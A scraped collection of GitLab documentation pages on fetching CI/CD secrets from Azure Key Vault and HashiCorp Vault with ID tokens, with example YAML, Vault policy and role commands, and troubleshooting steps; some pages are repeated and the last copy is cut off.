variables](../variables/_index.md#define-a-cicd-variable-in-the-ui), if preferred. We use [`secrets:file:false`](../yaml/_index.md#secretsfile) because ID tokens place secrets in a file by default, but we need it to work as a regular variable to match the old behavior. ### KV Secrets Engine v2 There are two formats you can use for the v2 engine. Long format: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: engine: name: kv-v2 path: secret field: password path: myproject/staging/db file: false ``` This is the same as the example for the v1 engine but `secrets:vault:engine:name:` is set to `kv-v2` to match the engine. You can also use a short format: ```yaml job: variables: VAULT_SERVER_URL: https://vault.example.com VAULT_AUTH_PATH: jwt_v2 # or "jwt" if you used method B VAULT_AUTH_ROLE: myproject-staging id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: PASSWORD: vault: myproject/staging/db/password@secret file: false ``` After you commit the updated CI/CD configuration, your jobs will be fetching secrets with ID Tokens, congratulations! If you have migrated all projects to fetch secrets with ID Tokens and used method B for the migration, it is now possible to move the `iss` claim validation back to the auth method configuration if you desire.
https://docs.gitlab.com/ci/azure_key_vault
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/azure_key_vault.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
azure_key_vault.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use Azure Key Vault secrets in GitLab CI/CD
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271271) in GitLab and GitLab Runner 16.3. Due to [issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) this feature did not work as expected. - [Issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) resolved and this feature made generally available in GitLab Runner 16.6. {{< /history >}} You can use secrets stored in the [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault/) in your GitLab CI/CD pipelines. Prerequisites: - Have a [Key Vault](https://learn.microsoft.com/en-us/azure/key-vault/general/quick-create-portal) on Azure. - Your IAM user must be [granted the **Key Vault Administrator** role assignment](https://learn.microsoft.com/en-us/azure/role-based-access-control/quickstart-assign-role-user-portal#grant-access) for the **resource group** assigned to the Key Vault. Otherwise, you can't create secrets inside the Key Vault. - [Configure OpenID Connect in Azure to retrieve temporary credentials](../cloud_services/azure/_index.md). These steps include instructions on how to create an Azure AD application for Key Vault access. - Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your Vault server: - `AZURE_KEY_VAULT_SERVER_URL`: The URL of your Azure Key Vault server, such as `https://vault.example.com`. - `AZURE_CLIENT_ID`: The client ID of the Azure application. - `AZURE_TENANT_ID`: The tenant ID of the Azure application. ## Use Azure Key Vault secrets in a CI/CD job You can use a secret stored in your Azure Key Vault in a job by defining it with the [`azure_key_vault`](../yaml/_index.md#secretsazure_key_vault) keyword: ```yaml job: id_tokens: AZURE_JWT: aud: 'https://gitlab.com' secrets: DATABASE_PASSWORD: token: $AZURE_JWT azure_key_vault: name: 'test' version: '00000000000000000000000000000000' ``` In this example: - `aud` is the audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/azure/_index.md#create-azure-ad-federated-identity-credentials) - `name` is the name of the secret in Azure Key Vault. - `version` is the version of the secret in Azure Key Vault. The version is a generated GUID without dashes, which can be found on the Azure Key Vault secrets page. - GitLab fetches the secret from Azure Key Vault and stores the value in a temporary file. The path to this file is stored in a `DATABASE_PASSWORD` CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables). ## Troubleshooting Refer to [OIDC for Azure troubleshooting](../cloud_services/azure/_index.md#troubleshooting) for general problems when setting up OIDC with Azure. ### `JWT token is invalid or malformed` message You might receive this error when fetching secrets from Azure Key Vault: ```plaintext RESPONSE 400 Bad Request AADSTS50027: JWT token is invalid or malformed. ``` This occurs due to a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) in GitLab Runner where the JWT token isn't parsed correctly. To resolve this, upgrade to GitLab Runner 16.6 or later. ### `Caller is not authorized to perform action on resource` message You might receive this error when fetching secrets from Azure Key Vault: ```plaintext RESPONSE 403: 403 Forbidden ERROR CODE: Forbidden Caller is not authorized to perform action on resource.\r\nIf role assignments, deny assignments or role definitions were changed recently, please observe propagation time. ForbiddenByRbac ``` If your Azure Key Vault is using RBAC, you must add the **Key Vault Secrets User** role assignment to your Azure AD application. For example: ```shell appId=$(az ad app list --display-name gitlab-oidc --query '[0].appId' -otsv) az role assignment create --assignee $appId --role "Key Vault Secrets User" --scope /subscriptions/<subscription-id> ``` You can find your subscription ID in: - The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription). - The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription). ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access Azure Key Vault: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because one or more of the required variables are not defined: - `AZURE_KEY_VAULT_SERVER_URL` - `AZURE_CLIENT_ID` - `AZURE_TENANT_ID`
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use Azure Key Vault secrets in GitLab CI/CD breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/271271) in GitLab and GitLab Runner 16.3. Due to [issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) this feature did not work as expected. - [Issue 424746](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) resolved and this feature made generally available in GitLab Runner 16.6. {{< /history >}} You can use secrets stored in the [Azure Key Vault](https://azure.microsoft.com/en-us/products/key-vault/) in your GitLab CI/CD pipelines. Prerequisites: - Have a [Key Vault](https://learn.microsoft.com/en-us/azure/key-vault/general/quick-create-portal) on Azure. - Your IAM user must be [granted the **Key Vault Administrator** role assignment](https://learn.microsoft.com/en-us/azure/role-based-access-control/quickstart-assign-role-user-portal#grant-access) for the **resource group** assigned to the Key Vault. Otherwise, you can't create secrets inside the Key Vault. - [Configure OpenID Connect in Azure to retrieve temporary credentials](../cloud_services/azure/_index.md). These steps include instructions on how to create an Azure AD application for Key Vault access. - Add [CI/CD variables to your project](../variables/_index.md#for-a-project) to provide details about your Vault server: - `AZURE_KEY_VAULT_SERVER_URL`: The URL of your Azure Key Vault server, such as `https://vault.example.com`. - `AZURE_CLIENT_ID`: The client ID of the Azure application. - `AZURE_TENANT_ID`: The tenant ID of the Azure application. ## Use Azure Key Vault secrets in a CI/CD job You can use a secret stored in your Azure Key Vault in a job by defining it with the [`azure_key_vault`](../yaml/_index.md#secretsazure_key_vault) keyword: ```yaml job: id_tokens: AZURE_JWT: aud: 'https://gitlab.com' secrets: DATABASE_PASSWORD: token: $AZURE_JWT azure_key_vault: name: 'test' version: '00000000000000000000000000000000' ``` In this example: - `aud` is the audience, which must match the audience used when [creating the federated identity credentials](../cloud_services/azure/_index.md#create-azure-ad-federated-identity-credentials) - `name` is the name of the secret in Azure Key Vault. - `version` is the version of the secret in Azure Key Vault. The version is a generated GUID without dashes, which can be found on the Azure Key Vault secrets page. - GitLab fetches the secret from Azure Key Vault and stores the value in a temporary file. The path to this file is stored in a `DATABASE_PASSWORD` CI/CD variable, similar to [file type CI/CD variables](../variables/_index.md#use-file-type-cicd-variables). ## Troubleshooting Refer to [OIDC for Azure troubleshooting](../cloud_services/azure/_index.md#troubleshooting) for general problems when setting up OIDC with Azure. ### `JWT token is invalid or malformed` message You might receive this error when fetching secrets from Azure Key Vault: ```plaintext RESPONSE 400 Bad Request AADSTS50027: JWT token is invalid or malformed. ``` This occurs due to a [known issue](https://gitlab.com/gitlab-org/gitlab/-/issues/424746) in GitLab Runner where the JWT token isn't parsed correctly. To resolve this, upgrade to GitLab Runner 16.6 or later. ### `Caller is not authorized to perform action on resource` message You might receive this error when fetching secrets from Azure Key Vault: ```plaintext RESPONSE 403: 403 Forbidden ERROR CODE: Forbidden Caller is not authorized to perform action on resource.\r\nIf role assignments, deny assignments or role definitions were changed recently, please observe propagation time. ForbiddenByRbac ``` If your Azure Key Vault is using RBAC, you must add the **Key Vault Secrets User** role assignment to your Azure AD application. For example: ```shell appId=$(az ad app list --display-name gitlab-oidc --query '[0].appId' -otsv) az role assignment create --assignee $appId --role "Key Vault Secrets User" --scope /subscriptions/<subscription-id> ``` You can find your subscription ID in: - The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription). - The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription). ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access Azure Key Vault: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because one or more of the required variables are not defined: - `AZURE_KEY_VAULT_SERVER_URL` - `AZURE_CLIENT_ID` - `AZURE_TENANT_ID`
https://docs.gitlab.com/ci/hashicorp_vault
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/hashicorp_vault.md
2025-08-13
doc/ci/secrets
[ "doc", "ci", "secrets" ]
hashicorp_vault.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use HashiCorp Vault secrets in GitLab CI/CD
null
{{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} Authenticating with `CI_JOB_JWT` was [deprecated in GitLab 15.9 and removed in GitLab 17.0](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). Use [ID tokens to authenticate with HashiCorp Vault](hashicorp_vault.md#example) instead, as demonstrated on this page. {{< /alert >}} {{< alert type="note" >}} Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings. {{< /alert >}} This tutorial demonstrates how to authenticate, configure, and read secrets with HashiCorp's Vault from GitLab CI/CD. ## Prerequisites This tutorial assumes you are familiar with GitLab CI/CD and Vault. To follow along, you must have: - An account on GitLab. - Access to a running Vault server (at least v1.2.0) to configure authentication and to create roles and policies. For HashiCorp Vaults, this can be the Open Source or Enterprise version. {{< alert type="note" >}} You must replace the `vault.example.com` URL in the following example with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. {{< /alert >}} ## HashiCorp Vault secrets integration ID tokens are JSON Web Tokens (JWTs) used for OIDC authentication with third-party services. If a job has at least one ID token defined, the `secrets` keyword automatically uses that token to authenticate with Vault. The following fields are included in the JWT: | Field | When | Description | |-------------------------|--------------------------------------------|-------------| | `jti` | Always | Unique identifier for this token | | `iss` | Always | Issuer, the domain of your GitLab instance | | `iat` | Always | Issued at | | `nbf` | Always | Not valid before | | `exp` | Always | Expires at | | `sub` | Always | Subject (job ID) | | `namespace_id` | Always | Use this to scope to group or user level namespace by ID | | `namespace_path` | Always | Use this to scope to group or user level namespace by path | | `project_id` | Always | Use this to scope to project by ID | | `project_path` | Always | Use this to scope to project by path | | `user_id` | Always | ID of the user executing the job | | `user_login` | Always | Username of the user executing the job | | `user_email` | Always | Email of the user executing the job | | `pipeline_id` | Always | ID of this pipeline | | `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables) | | `job_id` | Always | ID of this job | | `ref` | Always | Git ref for this job | | `ref_type` | Always | Git ref type, either `branch` or `tag` | | `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. | | `ref_protected` | Always | `true` if this Git ref is protected, `false` otherwise | | `environment` | Job specifies an environment | Environment this job specifies | | `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11). | | `environment_protected` | Job specifies an environment | `true` if specified environment is protected, `false` otherwise | | `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of environment this job specifies ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2) | | `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) | Example JWT payload: ```json { "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558", "iss": "gitlab.example.com", "iat": 1585710286, "nbf": 1585798372, "exp": 1585713886, "sub": "job_1212", "namespace_id": "1", "namespace_path": "mygroup", "project_id": "22", "project_path": "mygroup/myproject", "user_id": "42", "user_login": "myuser", "user_email": "myuser@example.com", "pipeline_id": "1212", "pipeline_source": "web", "job_id": "1212", "ref": "auto-deploy-2020-04-01", "ref_type": "branch", "ref_path": "refs/heads/auto-deploy-2020-04-01", "ref_protected": "true", "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"], "environment": "production", "environment_protected": "true", "environment_action": "start" } ``` The JWT is encoded by using RS256 and signed with a dedicated private key. The expire time for the token is set to job's timeout, if specified, or 5 minutes if it is not. The key used to sign this token may change without any notice. In such case retrying the job generates new JWT using the current signing key. You can use this JWT for authentication with a Vault server that is configured to allow the JWT authentication method. Provide your GitLab instance's base URL (for example `https://gitlab.example.com`) to your Vault server as the `oidc_discovery_url`. The server can then retrieve the keys for validating the token from your instance. When configuring roles in Vault, you can use [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) to match against the JWT claims and restrict which secrets each CI/CD job has access to. To communicate with Vault, you can use either its CLI client or perform API requests (using `curl` or another client). ## Example {{< alert type="warning" >}} JWTs are credentials, which can grant access to resources. Be careful where you paste them! {{< /alert >}} Consider a scenario where you store passwords for your staging and production databases in a Vault server. This scenario assumes you use the [KV v2](https://developer.hashicorp.com/vault/docs/secrets/kv#kv-version-2) secret engine. If you are using [KV v1](https://developer.hashicorp.com/vault/docs/secrets/kv#version-comparison), remove `/data/` from the following policy paths, and see [how to configure your CI/CD jobs](convert-to-id-tokens.md#kv-secrets-engine-v1). You can retrieve the passwords with the `vault kv get` command. ```shell $ vault kv get -field=password secret/myproject/staging/db pa$$w0rd $ vault kv get -field=password secret/myproject/production/db real-pa$$w0rd ``` Your staging password is `pa$$w0rd`, and your production password is `real-pa$$w0rd`. To configure your Vault server, start by enabling the [JWT Auth](https://developer.hashicorp.com/vault/docs/auth/jwt) method: ```shell $ vault auth enable jwt Success! Enabled jwt auth method at: jwt/ ``` Then create policies that allow you to read these secrets (one for each secret): ```shell $ vault policy write myproject-staging - <<EOF # Policy name: myproject-staging # # Read-only permission on 'secret/data/myproject/staging/*' path path "secret/data/myproject/staging/*" { capabilities = [ "read" ] } EOF Success! Uploaded policy: myproject-staging $ vault policy write myproject-production - <<EOF # Policy name: myproject-production # # Read-only permission on 'secret/data/myproject/production/*' path path "secret/data/myproject/production/*" { capabilities = [ "read" ] } EOF Success! Uploaded policy: myproject-production ``` You also need roles that link the JWT with these policies. For example, one role for staging named `myproject-staging`. The [bound claims](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) is configured to only allow the policy to be used for the `main` branch in the project with ID `22`: ```shell $ vault write auth/jwt/role/myproject-staging - <<EOF { "role_type": "jwt", "policies": ["myproject-staging"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims": { "project_id": "22", "ref": "main", "ref_type": "branch" } } EOF ``` And one role for production named `myproject-production`. The `bound_claims` section for this role only allows protected branches that match the `auto-deploy-*` pattern to access the secrets. ```shell $ vault write auth/jwt/role/myproject-production - <<EOF { "role_type": "jwt", "policies": ["myproject-production"], "token_explicit_max_ttl": 60, "user_claim": "user_email", "bound_audiences": "https://vault.example.com", "bound_claims_type": "glob", "bound_claims": { "project_id": "22", "ref_protected": "true", "ref_type": "branch", "ref": "auto-deploy-*" } } EOF ``` Combined with [protected branches](../../user/project/repository/branches/protected.md), you can restrict who is able to authenticate and read the secrets. Any of the claims [included in the JWT](#hashicorp-vault-secrets-integration) can be matched against a list of values in the bound claims. For example: ```json "bound_claims": { "user_login": ["alice", "bob", "mallory"] } "bound_claims": { "ref": ["main", "develop", "test"] } "bound_claims": { "namespace_id": ["10", "20", "30"] } "bound_claims": { "project_id": ["12", "22", "37"] } ``` - If only `namespace_id` is used, all projects in the namespace are allowed. Nested projects are not included, so their namespace IDs must also be added to the list if needed. - If both `namespace_id` and `project_id` are used, Vault first checks if the project's namespace is in `namespace_id` then checks if the project is in `project_id`. [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl) specifies that the token issued by Vault, upon successful authentication, has a hard lifetime limit of 60 seconds. [`user_claim`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#user_claim) specifies the name for the Identity alias created by Vault upon a successful login. [`bound_claims_type`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims_type) configures the interpretation of the `bound_claims` values. If set to `glob`, the values are interpreted as globs, with `*` matching any number of characters. The claim fields listed in [the previous table](#hashicorp-vault-secrets-integration) can also be accessed for [Vault's policy path templating](https://developer.hashicorp.com/vault/tutorials/policies/policy-templating?in=vault%2Fpolicies) purposes by using the accessor name of the JWT auth in Vault. The [mount accessor name](https://developer.hashicorp.com/vault/tutorials/auth-methods/identity#step-1-create-an-entity-with-alias) (`ACCESSOR_NAME` in the following example) can be retrieved by running `vault auth list`. Policy template example making use of a named metadata field named `project_path`: ```plaintext path "secret/data/{{identity.entity.aliases.ACCESSOR_NAME.metadata.project_path}}/staging/*" { capabilities = [ "read" ] } ``` Role example to support the previous templated policy mapping the claim field, `project_path`, as a metadata field through use of [`claim_mappings`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#claim_mappings) configuration: ```plaintext { "role_type": "jwt", ... "claim_mappings": { "project_path": "project_path" } } ``` For the full list of options, see Vault's [Create Role documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role). {{< alert type="warning" >}} Always restrict your roles to project or namespace by using one of the provided claims (for example, `project_id` or `namespace_id`). Otherwise any JWT generated by this instance may be allowed to authenticate using this role. {{< /alert >}} Now, configure the JWT Authentication method: ```shell $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="https://gitlab.example.com" ``` [`bound_issuer`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_issuer) specifies that only a JWT with the issuer (that is, the `iss` claim) set to `gitlab.example.com` can use this method to authenticate, and that the `oidc_discovery_url` (`https://gitlab.example.com`) should be used to validate the token. For the full list of available configuration options, see Vault's [API documentation](https://developer.hashicorp.com/vault/api-docs/auth/jwt#configure). In GitLab, create the following [CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, for example `https://vault.example.com:8200`. - `VAULT_AUTH_ROLE` - Optional. Name of the Vault JWT Auth role to use when attempting to authenticate. In this tutorial, we already created two roles with the names `myproject-staging` and `myproject-production`. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured. - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted. Default is `jwt`. - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. If no namespace is specified, Vault uses the root (`/`) namespace. The setting is ignored by Vault Open Source. ### Automatic ID token authentication with Hashicorp Vault The following job, when run for the default branch, can read secrets under `secret/myproject/staging/`, but not the secrets under `secret/myproject/production/`: ```yaml job_with_secrets: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: STAGING_DB_PASSWORD: vault: myproject/staging/db/password@secret # translates to a path of 'secret/myproject/staging/db' and field 'password'. Authenticates using $VAULT_ID_TOKEN. script: - access-staging-db.sh --token $STAGING_DB_PASSWORD ``` In this example: - `id_tokens` - The JSON Web Token (JWT) used for OIDC authentication. The `aud` claim is set to match the `bound_audiences` parameter of the `role` used for the Vault JWT authentication method. - `@secret` - The vault name, where your Secrets Engines are enabled. - `myproject/staging/db` - The path location of the secret in Vault. - `password` The field to be fetched in the referenced secret. If more than one ID token is defined, use the `token` keyword to specify which token should be used. For example: ```yaml job_with_secrets: id_tokens: FIRST_ID_TOKEN: aud: https://first.service.com SECOND_ID_TOKEN: aud: https://second.service.com secrets: FIRST_DB_PASSWORD: vault: first/db/password token: $FIRST_ID_TOKEN SECOND_DB_PASSWORD: vault: second/db/password token: $SECOND_ID_TOKEN script: - access-first-db.sh --token $FIRST_DB_PASSWORD - access-second-db.sh --token $SECOND_DB_PASSWORD ``` ### Manual ID Token authentication You can use ID tokens to authenticate with HashiCorp Vault manually. For example: ```yaml manual_authentication: variables: VAULT_ADDR: http://vault.example.com:8200 image: vault:latest id_tokens: VAULT_ID_TOKEN: aud: http://vault.example.com script: - export VAULT_TOKEN="$(vault write -field=token auth/jwt/login role=myproject-example jwt=$VAULT_ID_TOKEN)" - export PASSWORD="$(vault kv get -field=password secret/myproject/example/db)" - my-authentication-script.sh $VAULT_TOKEN $PASSWORD ``` ### Limit token access to Vault secrets You can control ID token access to Vault secrets by using Vault protections and GitLab features. For example, restrict the token by: - Using Vault [bound audiences](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-audiences) for specific ID token `aud` claims. - Using Vault [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) for specific groups using `group_claim`. - Hard coding values for Vault bound claims based on the `user_login` and `user_email` of specific users. - Setting Vault time limits for TTL of the token as specified in [`token_explicit_max_ttl`](https://developer.hashicorp.com/vault/api-docs/auth/jwt#token_explicit_max_ttl), where the token expires after authentication. - Scoping the JWT to [GitLab protected branches](../../user/project/repository/branches/protected.md) that are restricted to a subset of project users. - Scoping the JWT to [GitLab protected tags](../../user/project/protected_tags.md), that are restricted to a subset of project users. ## Troubleshooting ### `The secrets provider can not be found. Check your CI/CD variables and try again.` message You might receive this error when attempting to start a job configured to access HashiCorp Vault: ```plaintext The secrets provider can not be found. Check your CI/CD variables and try again. ``` The job can't be created because the required variable is not defined: - `VAULT_SERVER_URL` ### `api error: status code 400: missing role` error You might receive a `missing role` error when attempting to start a job configured to access HashiCorp Vault. The error could be because the `VAULT_AUTH_ROLE` variable is not defined, so the job cannot authenticate with the vault server. ### `audience claim does not match any expected audience` error If there is a mismatch between values of `aud:` claim of the ID token specified in the YAML file and the `bound_audiences` parameter of the `role` used for JWT authentication, you can get this error: `invalid audience (aud) claim: audience claim does not match any expected audience` Make sure these values are the same.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use HashiCorp Vault secrets in GitLab CI/CD breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} Authenticating with `CI_JOB_JWT` was [deprecated in GitLab 15.9 and removed in GitLab 17.0](../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated). Use [ID tokens to authenticate with HashiCorp Vault](hashicorp_vault.md#example) instead, as demonstrated on this page. {{< /alert >}} {{< alert type="note" >}} Starting in Vault 1.17, [JWT auth login requires bound audiences on the role](https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.17.x#jwt-auth-login-requires-bound-audiences-on-the-role) when the JWT contains an `aud` claim. The `aud` claim can be a single string or a list of strings. {{< /alert >}} This tutorial demonstrates how to authenticate, configure, and read secrets with HashiCorp's Vault from GitLab CI/CD. ## Prerequisites This tutorial assumes you are familiar with GitLab CI/CD and Vault. To follow along, you must have: - An account on GitLab. - Access to a running Vault server (at least v1.2.0) to configure authentication and to create roles and policies. For HashiCorp Vaults, this can be the Open Source or Enterprise version. {{< alert type="note" >}} You must replace the `vault.example.com` URL in the following example with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. {{< /alert >}} ## HashiCorp Vault secrets integration ID tokens are JSON Web Tokens (JWTs) used for OIDC authentication with third-party services. If a job has at least one ID token defined, the `secrets` keyword automatically uses that token to authenticate with Vault. The following fields are included in the JWT: | Field | When | Description | |-------------------------|--------------------------------------------|-------------| | `jti` | Always | Unique identifier for this token | | `iss` | Always | Issuer, the domain of your GitLab instance | | `iat` | Always | Issued at | | `nbf` | Always | Not valid before | | `exp` | Always | Expires at | | `sub` | Always | Subject (job ID) | | `namespace_id` | Always | Use this to scope to group or user level namespace by ID | | `namespace_path` | Always | Use this to scope to group or user level namespace by path | | `project_id` | Always | Use this to scope to project by ID | | `project_path` | Always | Use this to scope to project by path | | `user_id` | Always | ID of the user executing the job | | `user_login` | Always | Username of the user executing the job | | `user_email` | Always | Email of the user executing the job | | `pipeline_id` | Always | ID of this pipeline | | `pipeline_source` | Always | [Pipeline source](../jobs/job_rules.md#common-if-clauses-with-predefined-variables) | | `job_id` | Always | ID of this job | | `ref` | Always | Git ref for this job | | `ref_type` | Always | Git ref type, either `branch` or `tag` | | `ref_path` | Always | Fully qualified ref for the job. For example, `refs/heads/main`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/119075) in GitLab 16.0. | | `ref_protected` | Always | `true` if this Git ref is protected, `false` otherwise | | `environment` | Job specifies an environment | Environment this job specifies | | `groups_direct` | User is a direct member of 0 to 200 groups | The paths of the user's direct membership groups. Omitted if the user is a direct member of more than 200 groups. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/435848) in GitLab 16.11). | | `environment_protected` | Job specifies an environment | `true` if specified environment is protected, `false` otherwise | | `deployment_tier` | Job specifies an environment | [Deployment tier](../environments/_index.md#deployment-tier-of-environments) of environment this job specifies ([introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/363590) in GitLab 15.2) | | `environment_action` | Job specifies an environment | [Environment action (`environment:action`)](../environments/_index.md) specified in the job. ([Introduced](https://gitlab.com/gitlab-org/gitlab/-/) in GitLab 16.5) | Example JWT payload: ```json { "jti": "c82eeb0c-5c6f-4a33-abf5-4c474b92b558", "iss": "gitlab.example.com", "iat": 1585710286, "nbf": 1585798372, "exp": 1585713886, "sub": "job_1212", "namespace_id": "1", "namespace_path": "mygroup", "project_id": "22", "project_path": "mygroup/myproject", "user_id": "42", "user_login": "myuser", "user_email": "myuser@example.com", "pipeline_id": "1212", "pipeline_source": "web", "job_id": "1212", "ref": "auto-deploy-2020-04-01", "ref_type": "branch", "ref_path": "refs/heads/auto-deploy-2020-04-01", "ref_protected": "true", "groups_direct": ["mygroup/mysubgroup", "myothergroup/myothersubgroup"], "environment": "production", "environment_protected": "true", "environment_action": "start" } ``` The JWT is encoded by using RS256 and signed with a dedicated private key. The expire time for the token is set to job's timeout, if specified, or 5 minutes if it is not. The key used to sign this token may change without any notice. In such case retrying the job generates new JWT using the current signing key. You can use this JWT for authentication with a Vault server that is configured to allow the JWT authentication method. Provide your GitLab instance's base URL (for example `https://gitlab.example.com`) to your Vault server as the `oidc_discovery_url`. The server can then retrieve the keys for validating the token from your instance. When configuring roles in Vault, you can use [bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) to match against the JWT claims and restrict which secrets each CI/CD job has access to. To communicate with Vault, you can use either its CLI client or perform API requests (using `curl` or another client). ## Example {{< alert type="warning" >}} JWTs are credentials, which can grant access to resources. Be careful where you paste them! {{< /alert >}} Consider a scenario where you store passwords for your staging and production databases in a Vault server. This scenario assumes you use the [KV v2](https://developer.hashicorp.com/vault/docs/secrets/kv#kv-version-2) secret engine. If you are using [KV v1](https://developer.hashicorp.com/vault/docs/secrets/kv#version-comparison), remove `/data/` from the following policy paths, and see [how to configure your CI/CD jobs](convert-to-id-tokens.md#kv-secrets-engine-v1). You can retrieve the passwords with the `vault kv get` command. ```shell $ vault kv get -field=password secret/myproject/staging/db pa$$w0rd $ vault kv get -field=password secret/myproject/production/db real-pa$$w0rd ``` Your staging password is `pa$$w0rd`, and your production password is `real-pa$$w0rd`. To configure your Vault server, start by enabling the [JWT Auth](https://developer.hashicorp.com/vault/docs/auth/jwt) method: ```shell $ vault auth enable jwt Success! Enabled jwt auth method at: jwt/ ``` Then create policies that allow you to read these secrets (one for each secret): ```shell $ vault policy write myproject-staging - <<EOF # Policy name: myproject-staging # # Read-only permission on 'secret/data/myproject/staging/*' path path "secret/data/myproject/staging/*" { capabilities = [ "read" ] } EOF Success! Uploaded policy: myproject-staging $ vault policy write myproject-production - <<EOF # Policy name: myproject-production # # Read-only permission on 'secret/data/myproject/production/*' path path "secret/data/myproject/production/*" { capabilities = [ "read" ] } EOF Success! Uploaded policy: myproject-production ``` You also need roles that link the JWT with these policies. For example, one role for staging named `myproject-staging`. The [bound claims](https://developer.hashicorp.com/vault/api-docs/auth/jwt#bound_claims) 